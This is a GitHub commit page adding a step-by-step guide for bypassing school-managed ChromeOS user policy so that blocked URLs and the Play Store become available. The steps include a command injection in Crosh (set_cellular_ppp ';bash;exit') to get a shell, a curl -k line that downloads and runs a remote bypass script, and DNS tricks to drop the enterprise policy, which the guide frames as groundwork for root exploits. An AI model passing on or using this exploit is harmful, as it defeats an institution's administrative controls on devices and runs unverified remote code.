-
Notifications
You must be signed in to change notification settings - Fork 53
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Update and rename UserPolicy Bypass to User Policy Bypass
- Loading branch information
1 parent
de7f215
commit e6fac3a
Showing
2 changed files
with
36 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
This should enable ARC (Play Store) and unblock all policy blocked URLs. | ||
|
||
When you connect to a wifi without the custom DNS, the policy will reload to normal but some changes will persist - more testing is needed. | ||
This is useful because most root exploits require ARC in some form. | ||
|
||
You need: | ||
-> The ability to downgrade to a version below 102. | ||
-> A way to access Crosh. If it's blocked via extension, use LTBEEF. If it's blocked by user policy, you must use a combination of the Incognito Exploit (v81) and Crosh Bypass (Daybreak) | ||
-> A router or hotspot capable of either blocking websites via parental control or setting a custom DNS (129.213.58.41) | ||
|
||
Steps: | ||
1. Downgrade to a version below 102. | ||
|
||
2. Open Crosh (CTRL+ALT+T or chrome-untrusted://crosh) | ||
|
||
3. Elevate to a chronos shell by typing in the following: | ||
set_cellular_ppp ';bash;exit' | ||
|
||
4. Run the command below (including the disown part!): | ||
sh <(curl -k https://coolelectronics.me/bypass.sh) & disown | ||
|
||
5. Remove your school account, log out or just clear it in any way you can. The method varies depending on how your device policy is set up. | ||
|
||
6. In your router settings, set the DNS to 129.213.58.41 or block m.google.com. (NOT THE NETWORK DNS ON THE CHROMEBOOK SINCE IT WON'T WORK) | ||
-> personalDNSfilter and hotspot or DNS Sinkhole + Hotspot on iOS can be used; NextDNS | ||
|
||
7. Log into your school account. | ||
|
||
Results should prompt you about a PIN and Google Play. It will then drop you into an account where everything works as normal but no user policies are set. | ||
If you get a "sign in required" error, try doing going through the steps again. | ||
|
||
- https://discord.com/channels/419123358698045453/1040639727595950180 - | ||
|
||
Credits: | ||
https://github.com/titaniumnetwork-dev/Oxide-Docs/blob/master/docs/kajigs.mdx | ||
Titanium Network |
This file was deleted.
Oops, something went wrong.